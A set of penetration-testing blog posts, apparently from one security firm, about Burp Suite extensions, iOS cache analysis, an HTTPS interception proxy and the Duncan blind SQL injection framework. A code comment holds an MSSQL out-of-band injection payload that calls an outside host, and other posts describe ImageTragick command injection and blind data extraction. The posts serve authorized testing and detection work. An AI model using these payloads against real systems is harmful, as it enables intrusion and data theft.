Not so unique snowflakes

Author: dnet

When faced with the problem of identifying entities, most people reach for incremental IDs. Since this requires a central actor to avoid duplicates and the values can be easily guessed, many solutions depend on UUIDs or GUIDs (universally / globally unique identifiers) instead. However, while uniqueness solves the first problem, it doesn’t necessarily solve the second. Below, we present our new solution for detecting such issues in web projects, in the form of an extension for Burp Suite Pro.
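To illustrate why uniqueness doesn’t imply unpredictability, consider version 1 (time-based) UUIDs; the minimal Java sketch below (the UUID value is an arbitrary example) shows how much information such a value leaks about when and where it was generated.

import java.util.UUID;

public class UuidInspector {
  public static void main(String[] args) {
    // A version 1 UUID embeds its creation time and the generating
    // host's MAC address, so consecutive values are easy to guess.
    UUID u = UUID.fromString("e4f7d9a0-7c5a-11e6-9f2c-0002a5d5c51b");
    System.out.println("version:   " + u.version());   // 1 = time-based
    System.out.println("timestamp: " + u.timestamp()); // 100 ns units since 1582-10-15
    System.out.println("node:      " + Long.toHexString(u.node())); // typically the MAC address
  }
}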



Beyond detection: exploiting blind SQL injections with Burp Collaborator

Author: dnet

It’s been a steady trend that most of our pentest projects revolve around web applications and/or involve database backends. The former part is usually made much easier by Burp Suite, which has a built-in scanner capable of identifying (among others) injections involving the latter. However, detection is only half of the work: a good pentester will use a SQL injection or similar database-related security hole to widen the coverage of the test (obviously within the project scope). Burp continually improves its scanning engine but provides no means for the further exploitation of these vulnerabilities, so in addition to manual testing, most pentesters use standalone tools. With the new features available since Burp Suite 1.7.09, we’ve found a way to combine the unique talents of Burp with our database exploitation framework, resulting in pretty interesting functionality.
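As a rough sketch of what those new features make possible – this illustrates the Collaborator client API added in 1.7.09, not our actual plugin code – an extension can generate a unique Collaborator payload, embed it in a database-specific out-of-band construct, and poll for interactions:

package burp;

import java.util.List;

public class BurpExtender implements IBurpExtender
{
  @Override
  public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks)
  {
    callbacks.setExtensionName("Collaborator SQLi sketch");
    IBurpCollaboratorClientContext collab = callbacks.createBurpCollaboratorClientContext();

    // unique subdomain to embed in a DNS-triggering payload, e.g. on MSSQL:
    //   '; EXEC master..xp_dirtree '\\<payload>\x' --
    String payload = collab.generatePayload(true);

    // ... send a request containing the payload here, then poll:
    List<IBurpCollaboratorInteraction> hits =
        collab.fetchCollaboratorInteractionsFor(payload);
    if (!hits.isEmpty())
      callbacks.issueAlert("Out-of-band interaction: the database executed our payload");
  }
}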



Accessing local variables in ProGuarded Android apps

Author: dnet

Debugging applications without access to the source code always has its problems, especially with debuggers that were built with developers in mind, who obviously don’t have this restriction. In one of our Android app security projects, we had to attach a debugger to the app to step through heavily obfuscated code.



Detecting ImageTragick with Burp Suite Pro

Author: dnet

After ImageTragick (CVE-2016-3714) was published, we immediately started thinking about detecting it with Burp, which we usually use for web application testing. Although Collaborator would be a perfect fit, as image processing can happen out-of-band, there’s no official way to tap into that functionality from an extension.

The next best thing is timing: we try to detect remote code execution by injecting the sleep command, which delays execution for a specified number of seconds. By measuring the time it takes to serve a response without and with the injected content, the difference tells us whether the code actually got executed by the server.

We used rce1.jpg from the ImageTragick PoC collection and modified it to fit our needs. By calling System.nanoTime() before and after the requests and subtracting the values, the time it took for the server to respond could be measured precisely.
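The measurement itself needs only a few lines in an extension; the sketch below is illustrative (the names are ours, not the released code) and assumes the usual extender callbacks are available:

// measure how long the server takes to answer a given request
private long timeRequestMillis(IBurpExtenderCallbacks callbacks,
                               IHttpService service, byte[] request)
{
  long before = System.nanoTime();
  callbacks.makeHttpRequest(service, request);
  return (System.nanoTime() - before) / 1000000L;
}

// the parameter is flagged when the payload-carrying request takes at least
// the injected delay longer than the unmodified baseline request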

Since we already had a Burp extension for image-related issues, it was modified to include an active scan option that detects ImageTragick. The JPEG/PNG/GIF detection part was reused so that it could detect if any parameters contain images, and if so, it replaces each (one at a time) with the modified rce1.jpg payload. The code was released as v0.3 and can be downloaded either in source format (under the MIT license) or as a compiled JAR for easier usage. Below is an example of a successful detection:

issue screenshot

Header image © Tomas Castelazo, www.tomascastelazo.com / Wikimedia Commons / CC-BY-SA-3.0


iOS HTTP cache analysis for abusing APIs and forensics

Author: dnet

We’ve tested a number of iOS apps over the last few years and have come to the conclusion that most developers follow the recommendation to use the APIs already in the system, instead of reinventing the wheel or unnecessarily depending on third-party libraries. This affects HTTP backend APIs as well, and quite a few apps use the built-in NSURLRequest class to handle HTTP requests.

However, this results in a disk cache being created, with a structure similar to the one Safari uses. And if the server doesn’t set the appropriate Cache-Control headers, this can result in sensitive information being stored in a plaintext database.

Like others in the field of smartphone app security testing, we’ve also discovered such databases within the sandbox and included them in our reports as an issue. However, the cache can also be helpful for further analysis involving the API and for forensic purposes. Still, there were no ready-to-use tools for it, which is problematic given the convoluted format.

The cache can usually be found in Library/Caches/[id]/Cache.db, where [id] is application-specific, and is a standard SQLite 3 database, as can be seen below.

$ sqlite3 Cache.db
SQLite version 3.12.1 2016-04-08 15:09:49
Enter ".help" for usage hints.
sqlite> .tables
cfurl_cache_blob_data       cfurl_cache_response
cfurl_cache_receiver_data   cfurl_cache_schema_version

Within these tables, all the information can be found that is needed to reconstruct the requests issued by the app, along with the responses. (Well, almost; in practice, the lack of the HTTP version and status text is not a big problem.)

Since we use Burp Suite for HTTP-related projects (web applications and SOAP/REST APIs), an obvious solution was to develop a Burp plugin that could read such a database and present the requests and responses within Burp for analysis and for use in other modules such as Repeater, Intruder or Scanner.

As the database is an SQLite one, the quest began with choosing a JDBC driver that supports it; SQLiteJDBC seemed to be a good choice, however it uses precompiled binaries for some platforms, which limits its compatibility. After the first few tests it also became apparent that quite a few parts of JDBC are not implemented, including the handling of BLOBs (raw byte arrays, an optimal choice for storing complex structures not designed for direct human consumption). The quick workaround was to use HEX(foo), which returns a hexadecimal string of the blob foo, and then to parse it in the client.
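A condensed sketch of the workaround follows (table and column names are assumed from a typical Cache.db schema, so verify them against your own database):

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.Statement;

public class CacheDbDump {
  public static void main(String[] args) throws Exception {
    Connection conn = DriverManager.getConnection("jdbc:sqlite:Cache.db");
    try (Statement st = conn.createStatement();
         // HEX() sidesteps the driver's missing BLOB support
         ResultSet rs = st.executeQuery(
             "SELECT HEX(request_object) FROM cfurl_cache_blob_data")) {
      while (rs.next()) {
        byte[] blob = hexToBytes(rs.getString(1));
        // ... process the raw blob bytes
      }
    }
  }

  // client-side decoding of the hexadecimal string returned by HEX()
  static byte[] hexToBytes(String hex) {
    byte[] out = new byte[hex.length() / 2];
    for (int i = 0; i < out.length; i++)
      out[i] = (byte) Integer.parseInt(hex.substring(2 * i, 2 * i + 2), 16);
    return out;
  }
}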

BLOBs were used for almost all purposes; request and response bodies were stored verbatim (although without HTTP content encoding applied, see later), while request and response metadata like headers and the HTTP verb used were serialized into binary property lists, a format common on Apple systems. For the latter, we needed to find a parser, which was made harder by the fact that most solutions (be it code or forum responses) expected the XML-based representation (which is trivial to handle in any language), while in this case the more compact binary form was used. Although there are utilities to convert between the two (plutil, plistutil and others), I didn’t want to add an external command-line dependency and spawn several processes for every request.

Fortunately, I found a project called Quaqua that had a class for parsing the binary format. Although it also tried converting the object tree to the XML format, a bit of modification fixed this as well.

With these in place, I could easily convert the metadata to HTTP headers, and append the appropriate bodies (if present). For the UI, I took inspiration from Logger++ but used a much simpler list for enumerating the requests, since I wanted a working prototype first. (Pull requests regarding this are welcome!)

Most of the work was solving small quirks: for example, as mentioned above, HTTP content encoding (such as gzip) was stripped before saving the body, but the headers referred to the encoded payload, so both the Content-Length and the Content-Encoding headers needed to be removed, and the former had to be filled in based on the decoded (“unencoded”) body.
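In Burp extender terms, the fix-up boils down to something like the following (a simplified sketch, not the plugin’s exact code):

// headers as returned by helpers.analyzeResponse(), body already decoded
List<String> headers = responseInfo.getHeaders();
headers.removeIf(h -> h.toLowerCase().startsWith("content-encoding:"));
headers.removeIf(h -> h.toLowerCase().startsWith("content-length:"));
headers.add("Content-Length: " + body.length); // length of the decoded body
byte[] httpMessage = helpers.buildHttpMessage(headers, body);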

Below is a screenshot of the plugin in action; some values have been masked to protect the innocent.

screenshot of the plugin

The source code is available on GitHub under MIT license, with pre-built JAR binaries downloadable from the releases page.

Featured image is Apfelteiler by Frank C. Müller licensed under CC BY-SA


Proxying nonstandard HTTPS traffic

Author: dnet

Depending on the time spent in IT, most professionals have seen an instance or two where developers based their implementations on specific quirks and other non-standard behaviors; a well-known example is greylisting, and another oft-used but less-known one is Wi-Fi band steering. In all these cases, the solution works within a range of implementations, which usually covers most client needs. However, just one step outside that range can result in lengthy investigations into how such a simple thing as sending an e-mail or joining a Wi-Fi network can go wrong.

During one of our application security assessments, we found an implementation that abused the way HTTP worked. The functionality required server push, but the developers probably decided to use HTTP anyway to get through corporate firewalls, and the application came from the age before WebSockets and HTTP/2. So they came up with the idea of sending headers like the ones below, then keeping the connection open without sending any data.

HTTP/1.0 200 OK
Server: IDealRelay
Date: Wed, 16 Sep 2015 18:03:24 GMT
Content-length: 10000000
Connection: close
Content-type: text/plain

Googling the value of the Server header revealed mostly false positives; however, as it turned out, there’s even a patent (US 7734791 B2, titled “Asynchronous hypertext messaging”) that describes this behavior. Sending data to the server happened over separate HTTP channels, which themselves returned worthless responses, while the real response arrived in the first HTTP channel, which promised to deliver 10 megabytes in its Content-length header.

Some corporate proxies might have handled this well, however the Proxy module of Burp Suite waited for the full 10 MB to arrive and hung there for all eternity – and even if it had managed to receive some data, its Scanner module couldn’t have handled the correlation between sending a payload in one request and getting the response in another. To solve the problem, I decided to throw together a simple HTTPS proxy that doesn’t assume much about the contents: it just accepts CONNECT requests, performs a Man-in-the-Middle (MITM) attack and dumps the plaintext traffic into a file.

Multiple streams needed to be handled asynchronously, so I chose Erlang for its unique properties, and used built-in modules for everything except generating the fake certificates for MITM. Since such certificates are cached, I chose to sign them using the command-line version of OpenSSL for the sake of simplicity, so a whitelist is applied to the hostname to avoid command injection attacks – even though it’s supposed to be a tool for debugging “well-behaving” applications, it never hurts to be protected and to set a good example. As the output format, PCAP was chosen, as it’s simple (the PCAP writer itself is 32 lines of Erlang code) and widely supported by tools such as Wireshark.

The proxy logic fits into 124 lines of code and waits for new TCP connections. By setting the socket into HTTP mode, the standard library does all the parsing of the CONNECT request. A standard response is sent, and from this point the mode is changed back to raw, and both the server and the client get an SSL handshake from the proxy. Server certificates used for MITM are cached in an ETS table (a built-in high-performance in-memory database) shared between the lightweight, thread-like Erlang processes, so certificates are signed only once per hostname, and the private key is the same for the CA and all the certificates.

After the handshake, traffic is simply forwarded between the peers and simultaneously written into the PCAP file. TCP/IP headers are added with the same port/address tuple as the original stream, while sequence/acknowledgement values are adjusted to reflect the plaintext content. This way, Wireshark doesn’t have any problems reassembling the stream and can even detect and dissect known application protocols. The source code of the SSL proxy is available in our GitHub repository under the MIT license; pull requests are welcome.
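The PCAP format really is that simple; for illustration, here is what an equivalent minimal writer could look like in Java (the actual proxy implements this in Erlang):

import java.io.DataOutputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.nio.ByteBuffer;
import java.nio.ByteOrder;

public class PcapWriter {
  private final DataOutputStream out;

  public PcapWriter(String path) throws IOException {
    out = new DataOutputStream(new FileOutputStream(path));
    ByteBuffer hdr = ByteBuffer.allocate(24).order(ByteOrder.LITTLE_ENDIAN);
    hdr.putInt(0xa1b2c3d4);   // magic number
    hdr.putShort((short) 2);  // major version
    hdr.putShort((short) 4);  // minor version
    hdr.putInt(0);            // timezone offset
    hdr.putInt(0);            // timestamp accuracy
    hdr.putInt(65535);        // snapshot length
    hdr.putInt(101);          // link type: raw IP packets
    out.write(hdr.array());
  }

  // each record is a 16-byte header followed by the packet bytes
  public void writePacket(byte[] packet) throws IOException {
    long now = System.currentTimeMillis();
    ByteBuffer rec = ByteBuffer.allocate(16).order(ByteOrder.LITTLE_ENDIAN);
    rec.putInt((int) (now / 1000));          // seconds
    rec.putInt((int) (now % 1000) * 1000);   // microseconds
    rec.putInt(packet.length);               // captured length
    rec.putInt(packet.length);               // original length
    out.write(rec.array());
    out.write(packet);
  }
}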

With the plaintext traffic in our hands, we managed to develop another tool to experiment with the service, and as a result we found several vulnerabilities, including critical ones. The lesson to learn is that just because tools cannot intercept traffic out of the box, it doesn’t mean that the application is secure – existing tools are great for lots of purposes, but one big difference between hackers and script kiddies is the ability of the former to develop their own tools.


Testing websites using ASP.NET Forms Authentication with Burp Suite

Author: dnet

Testing a website is usually considered just another day at work, and Burp Suite is usually our tool of choice for automating some of the scans that apply in this field. Assessing the authenticated part of the site is also common, and since Burp can be used as an HTTP proxy, it can capture our session tokens (usually HTTP cookies) and perform scans just like we would as humans. This token usually remains unchanged for the lifetime of the session, and the session itself is kept alive by the scanner activity itself.

However, a few weeks ago we encountered an ASP.NET site that offered the regular ASP.NET_SessionId cookie, and after a successful login we got another one called .ASPXFORMSAUTH, indicating that the application uses Forms Authentication. We started issuing requests including these two cookies, but within 5 minutes the server started responding as if we weren’t logged in. Investigation followed, and we could reproduce that even when sending a request every 10 seconds, requests with the two original cookies are denied once 2 minutes have passed since login. The operators confirmed that the session timeout is 2 minutes (which is reasonable given the normal use-cases of the application), and looking at the responses revealed that around halfway between login and the 2-minute deadline, a new .ASPXFORMSAUTH cookie is set by the server.

Apparently, Burp Suite ignored such Set-Cookie headers at the time, both in its Scanner and Intruder modules, so I wrote a simple plugin that hooks HTTP requests within Burp and behaves like a browser for this specific cookie. If such a cookie is received, it gets stored as a protected field of the class, and subsequent requests are modified to include the latest value. Since Burp uses multiple threads, this value also needs locking in order to avoid race conditions. Burp also offers some help with parsing and mangling HTTP headers, so besides hooking HTTP traffic and initialization, the plugin starts by storing a reference to an instance of the IExtensionHelpers interface.

package burp;

import java.util.List;

public class BurpExtender implements IBurpExtender, IHttpListener
{
  protected IExtensionHelpers helpers;
  protected String cookie_value = null;
  public static final String COOKIE_NAME = ".ASPXFORMSAUTH";

  @Override
  public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks)
  {
    // keep a reference to the helpers for header parsing and mangling
    helpers = callbacks.getHelpers();
    callbacks.setExtensionName("AspxFormAuth");
    // subscribe to all HTTP traffic passing through Burp
    callbacks.registerHttpListener(this);
  }

By registering an HTTP listener, the processHttpMessage method will be called by Burp every time an HTTP message passes through, regardless of its source, including the browser, the Scanner or the Intruder module. The messageIsRequest parameter can be used to define different behavior for requests and responses; in the case of the former, any Cookie: headers with the matching name in the request are updated to the latest value (if there’s one, hence the null check).

@Override
public void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequestResponse messageInfo)
{
  if (messageIsRequest)
  {
    synchronized (this) {
      if (cookie_value == null) return; // nothing captured yet
    }
    byte[] request = messageInfo.getRequest();
    IRequestInfo ri = helpers.analyzeRequest(request);
    List<IParameter> parameters = ri.getParameters();
    for (IParameter parameter : parameters) {
      if (parameter.getType() == IParameter.PARAM_COOKIE &&
          parameter.getName().equals(COOKIE_NAME)) {
        synchronized (this) {
          // rewrite the cookie to the freshest value seen so far
          messageInfo.setRequest(helpers.updateParameter(request,
                helpers.buildParameter(COOKIE_NAME, cookie_value,
                  IParameter.PARAM_COOKIE)));
        }
      }
    }
  }

The only remaining task is feeding the cookie_value member with tokens by parsing responses. Again, the Burp helpers are used to analyze the headers, and if a cookie with a matching name is found, its value is stored, taking special care to let only a single thread access the value at a time.

else
{
  IResponseInfo ri = helpers.analyzeResponse(messageInfo.getResponse());
  List<ICookie> cookies = ri.getCookies();
  for (ICookie cookie : cookies) {
    if (cookie.getName().equals(COOKIE_NAME)) {
      synchronized (this) {
        // remember the renewed token for subsequent requests
        cookie_value = cookie.getValue();
      }
    }
  }
}

Using this technique, we were able to perform the assessment; the full source code can be found in a branch of our GitHub repository. If you don’t want to compile it yourself, a binary JAR is also available on the release page. We’re also proud that since we released the Burp OAuth plugin this one is based on, it has been built upon and improved by SecureIdeas as part of their Co2 plugin.


Duncan – Expensive injections

Author: b

During a web application test, one of the most precious bugs you can find is a good old SQL injection: these vulnerabilities can let you bypass all the security controls of the application, elevate your privileges, find new (possibly vulnerable) functionality, and in the end take control of the entire database server, possibly pivoting your attack into the depths of the target network.

Fortunately for application operators, SQL injection vulnerabilities are not that easy to come by, thanks to robust development frameworks and smart testing tools. That being said, these vulnerabilities are here to stay, although many times you can only discover them the hard, manual way, hidden deep inside some complex feature. After discovery, exploitation can be even more painful, since information emitted by the database often disappears as it goes through the layers of the application, leaving you with a fully blind scenario. And although there are great generic tools (like SQLmap or SQLninja) to retrieve meaningful information by taking advantage of these bugs, there are many cases when configuring or even patching your favorite software takes more effort in the end than writing your specific exploit from scratch.

But we computer people are lazy and hate to reinvent the wheel every time we stumble upon some exotic injection, not to mention the debugging frenzy that a speed-coded search algorithm or a multi-threaded program can cause.

This is why I created Duncan (named after the blind, weak but loyal attendant of the Prince of Thieves), a simple but powerful Python program skeleton/module that saves you from the most daunting tasks of SQLi exploit development: it takes care of threading, implements tested search algorithms and provides a convenient command-line interface (which might be an oxymoron…) for configuration. You only have to implement a single method that checks the value of one character of a custom query result (typically this can be done in 5-8 lines of code) and you can start looting; Duncan takes care of everything else. A generic sketch of this division of labor follows the image below.

Good old Duncan
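To give an idea of how little the application-specific part is (shown here as generic Java pseudocode, not Duncan’s actual Python API): the framework only needs a 1-bit oracle from you, and the classic number-guessing binary search does the rest.

// the only application-specific part: one boolean answer per request
interface BlindOracle {
  // true iff the character at `position` of the query result is > `guess`
  boolean isGreaterThan(int position, char guess);
}

// reusable extraction logic: binary search over the printable ASCII range
static char extractChar(BlindOracle oracle, int position) {
  char lo = 0x20, hi = 0x7e;
  while (lo < hi) {
    char mid = (char) ((lo + hi) / 2);
    if (oracle.isGreaterThan(position, mid))
      lo = (char) (mid + 1);
    else
      hi = mid;
  }
  return lo;
}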

Time == Money

Besides the simple blind injection – which was really just an exercise to clean the rust off the coder part of my brain – I also wanted to support time-based injections, which may look identical to standard blind injections, but there might be a catch:

While typical blind injections are usually exploitable through some kind of 1-bit information leak and are basically identical to the well-known number-guessing game, time-based injection has an interesting property, namely that you have to “pay some price” (spend a considerable amount of time) every time you guess (in)correctly. Optimizing an exploit to minimize this cost sounded like a fun idea to play with, so I brought up the topic at Camp0, where we created a simple test program and some proof-of-concept algorithms (the algorithms are named after my participating friends, CJ and Synapse – kudos to them!).

We concluded that as the set of possible guesses shrinks, linear search becomes more beneficial than binary search, since in the former case the number of expensive guesses is constant (but you have to make more cheap requests overall), while in the latter case we can expect the number of expensive requests to be proportional to the logarithm of the set size (but we have to make fewer requests overall).

So basically both implemented algorithms fall back to linear search under different conditions related to the set size and the ratio of the costs of correct and incorrect guesses.
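A toy cost model captures the reasoning (the numbers are illustrative only): with a linear equality scan the sleep triggers exactly once, on the correct guess, while binary search triggers it on roughly half of its ~log2(n) comparisons.

static double linearCost(int n, double cheap, double expensive) {
  return (n / 2.0) * cheap + expensive;     // ~n/2 misses plus the single hit
}

static double binaryCost(int n, double cheap, double expensive) {
  double steps = Math.ceil(Math.log(n) / Math.log(2));
  return steps * (cheap + expensive) / 2.0; // each step is expensive ~half the time
}

// with n = 16 candidates, cheap = 0.1 s and expensive = 5 s:
//   linearCost(16, 0.1, 5) = 0.8 + 5.0 = 5.8 s
//   binaryCost(16, 0.1, 5) = 4 * 2.55  = 10.2 s  -> linear wins on small sets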

This works pretty well in model implementations, saving 20-30% of the time on average, so I decided to implement a similar algorithm in Duncan too.

Unfortunately, as it turned out, the optimizations only made a (positive) difference in some unlikely edge cases, and implementing a simple auto-tuning mechanism for the timing could have had much bigger benefits. Luckily, Duncan allows you to implement such more advanced algorithms pretty easily :)

Update 2017.01.03: After 3 years, Erick Wong from Mathematics Stack Exchange provided us with a comprehensive answer to this problem. As it turned out, “the optimized algorithm can yield significant performance gain in case the penalty is big (e.g. querying a large dataset)”.

So feel free to use Duncan in your own pentest projects or to experiment with more advanced algorithms; the source code, along with some implementation and usage examples, is available in our GitHub repository.